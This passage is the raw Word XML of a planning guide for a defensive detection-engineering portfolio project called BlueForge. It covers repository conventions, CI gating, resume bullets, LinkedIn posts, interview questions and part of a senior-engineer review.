        <w:t xml:space="preserve">Three axes:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(detection, feature, bug, docs, test),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">area</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(collectors, normalizer,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detections, enrichment, reporting, hunting), and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">phase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(0 to 4). Plus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">priority: high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good first task</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Labeling every issue makes the board readable and shows intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="issue-templates-in-githubissue_template"/>
      <w:r>
        <w:t xml:space="preserve">Issue templates (in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/ISSUE_TEMPLATE/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79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bug_report</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- what happened, repro, environment.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feature_request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- problem, proposed solution, roadmap phase.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detection_request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- MITRE technique, attacker behavior, log source, expected false positives.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This one is the tell that a detection engineer runs this repo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="pull-request-template"/>
      <w:r>
        <w:t xml:space="preserve">Pull request template</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every PR states its type, links an issue, names the MITRE technique for detections, and carries a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">checklist (lint passes, tests pass, detection has a test and FP notes, no secrets). Even solo, you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">open PRs from feature branches so the history reads professionally and CI gates every change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="commit-conventions-conventional-commits"/>
      <w:r>
        <w:t xml:space="preserve">Commit conventions (Conventional Commits)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">type(scope): summary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, imperative mood, under ~72 chars. Types: feat, fix, docs, test, refactor,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chore, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for new/updated rules. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detection(sigma): add certutil download rule (T1105)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">feat(normalizer): map Windows 4625 to authentication events</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fix(engine): make command-line matching case-insensitive</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docs(architecture): add data-flow diagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">test(enrichment): cover private vs public IP separation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why it matters: consistent history lets you (and a reviewer) scan what changed, and it enables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">automatic changelogs later.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="branching-and-release-strategy"/>
      <w:r>
        <w:t xml:space="preserve">Branching and release strategy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/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main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is always green and demoable. Work happens on short-lived</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">feat/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fix/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detection/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">branches, merged via PR after CI passes.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Semantic Versioning.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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">at the end of Phase 0/1, bump minor per phase, tag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at Phase 6. Each release gets notes generated from the changelog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021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follows Keep a Changelog and is updated in the same PR as the change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="ci-as-a-quality-gate"/>
      <w:r>
        <w:t xml:space="preserve">CI as a quality gate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/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on every push and PR: ruff, mypy, pytest across Python 3.10 to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.12, and a detection-validation job that parses every Sigma rule. A red check blocks merge. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">green badge in the README is honest evidence the project builds.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4" w:name="X73f5e9c6a82c81fc0ce55c798cb0bffda02600d"/>
      <w:r>
        <w:t xml:space="preserve">11. Career Application Material</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This section turns the work into interviews and offers. Use it as raw material; adapt to each job.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Never claim a phase you have not actually shipped. Honesty is the whole point of a portfolio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="resume-bullets-by-phase"/>
      <w:r>
        <w:t xml:space="preserve">Resume bullets by phase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use strong verbs and concrete numbers. Only add a bullet once the phase is genuinely done.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 0 (Foundation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Built and documented a self-hosted detection lab (Wazuh SIEM, Sysmon, Windows/Linux VMs) on an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">isolated network, with CI (GitHub Actions) enforcing lint, type-checks, and tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 (MVP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Designed a normalized event schema and a tested Python detection pipeline that ingests raw logs,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">normalizes them, and fires MITRE-mapped detections, producing automated Markdown incident reports.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 (Detection Engine)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authored 20+ detections (Sigma + Wazuh) mapped to MITRE ATT&amp;CK, each with unit tests, documented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">false positives, and investigation steps; built an ATT&amp;CK coverage report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 (Threat Hunting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ran safe, reversible attack simulations to validate detections and wrote hypothesis-driven hunts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and event timelines for multi-stage scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 (Automation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated alert triage end to end (IOC extraction, threat-intel enrichment, report generation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and built KQL parity detections in Microsoft Sentinel, aligned with SC-200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5 / 6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Prototyped a local-LLM alert-explanation assistant (no data leaving the host) and shipped a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">documented v1.0 with ATT&amp;CK coverage visualization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="linkedin-announcement-examples"/>
      <w:r>
        <w:t xml:space="preserve">LinkedIn announcement examples</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep them plain, specific, and free of hype. No em dashes, no buzzword soup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Kickoff post:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"I'm building BlueForge, a detection engineering and SOC automation platform, to learn the blue-team</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">craft by doing. Week one: Wazuh + Sysmon lab running on an isolated network, first Sigma rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">firing, and a CI pipeline keeping it honest. I'll share what I learn as I go."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Milestone post (Phase 2):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"BlueForge update: 20 detections now mapped to MITRE ATT&amp;CK, each with tests and documented false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">positives. The interesting part was tuning out benign PowerShell without missing the malicious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">encoded-command pattern. Repo and write-ups in the comments."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reflection post:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"Lesson from BlueForge this week: a LOLBIN like certutil is invisible if you detect the tool. You</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have to detect the behavior (download flags plus an external URL). Detection engineering is mostly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thinking like an attacker, then writing the smallest rule that still catches them."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="X52e858ce826a67f7e891de8861dc1eb06c15b1e"/>
      <w:r>
        <w:t xml:space="preserve">The 90-second project explanation (interview opener)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"BlueForge is a detection engineering platform I built to practice the full SOC loop. Logs from a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wazuh and Sysmon lab flow through a Python pipeline: collectors grab the raw events, a normalizer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">converts every format into one common schema, and a small Sigma-style engine runs my detections,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">each mapped to MITRE ATT&amp;CK. Matches get enriched with IOC extraction and threat-intel lookups, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the tool generates an incident report automatically. I built it dual-stack, so the same detections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also exist as KQL for Microsoft Sentinel, which lines up with my SC-200 work. I kept it deliberately</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">small so I can explain every component, and everything is tested with green CI."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="X52b326008edb4aabe24730e7d0670757caea9ac"/>
      <w:r>
        <w:t xml:space="preserve">Technical questions recruiters and interviewers may ask</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Walk me through what happens from a log arriving to an alert." (Answer: the data-flow diagram.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Why normalize logs? What is a common schema?" (Format independence; ECS/ASIM analogy.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Pick one detection and explain it, including its false positives."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"How do you know your detection coverage is good?" (ATT&amp;CK mapping + coverage script; and its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">limits: coverage is breadth, not depth.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"How would you tune a noisy rule without going blind?" (Baseline, add context, narrow the matcher,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">measure FP rate, never just delete the alert.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"What is a LOLBIN and why do they matter?" (certutil/mshta/regsvr32 example.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Difference between a detection and a hunt?" (Known-bad rule vs hypothesis-driven search.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"How do you handle secrets and untrusted data safely?" (env vars, no secrets in git, graceful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">degradation, isolated lab network.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"What would you change at enterprise scale?" (Storage to a real datastore, streaming ingestion,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">case management integration, alert deduplication.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="how-to-explain-the-architecture"/>
      <w:r>
        <w:t xml:space="preserve">How to explain the architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Draw the pipeline: sources -&gt; collectors -&gt; normalizer -&gt; detection engine -&gt; enrichment -&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reporting/hunting. Emphasize the two design decisions that carry the most weight: the common schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(so detections are format-independent) and the documented mini-engine (so nothing is a black box).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Then name one trade-off you made on purpose, for example choosing files over a database, and why.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="X21c22783ed5dd97bcea29774169708521f55e26"/>
      <w:r>
        <w:t xml:space="preserve">How to explain challenges (the part that lands offers)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Have two or three real stories ready, structured as situation, problem, what you tried, and what you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">learned. Good candidates from this project: making command-line matching case-insensitive after a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rule missed an upper-cased payload; separating public from private IPs so enrichment did not waste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lookups on RFC1918 addresses; deciding not to use the full pySigma library because you could not yet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">explain it. Interviewers trust "here is what broke and how I reasoned about it" far more than a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flawless demo.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1" w:name="X5746fc0ea797242f552133cba518b42297c6160"/>
      <w:r>
        <w:t xml:space="preserve">12. Senior Engineer Review</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A blunt review of BlueForge from four perspectives, as requested. Read this as the bar to clear, not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as flattery. The whole point is to fix the weaknesses before a real reviewer finds them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="as-a-microsoft-security-hiring-manager"/>
      <w:r>
        <w:t xml:space="preserve">As a Microsoft Security hiring manager</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strengths.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The dual-stack decision is smart for this market: Wazuh proves you can self-host and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reason about a SIEM, and the Sentinel/KQL parity plus SC-200 alignment maps directly to the job.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Clean repo, CI, and tests signal you can work on a team. The common-schema design shows you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">understand normalization, which is exactly the ASIM concept in Sentinel.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Right now the Microsoft side is the thinnest part (a couple of KQL files). For a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Microsoft role that is the part I care about most. The AI phase risks looking like resume-driven</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">development if it appears before the fundamentals are deep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">To stand out:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">get real telemetry into a Sentinel trial, show one analytics rule with a working</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">automation playbook (Logic App), and screenshot an incident in the Defender portal. Depth on the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Microsoft stack beats breadth everywhere else for this specific employer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
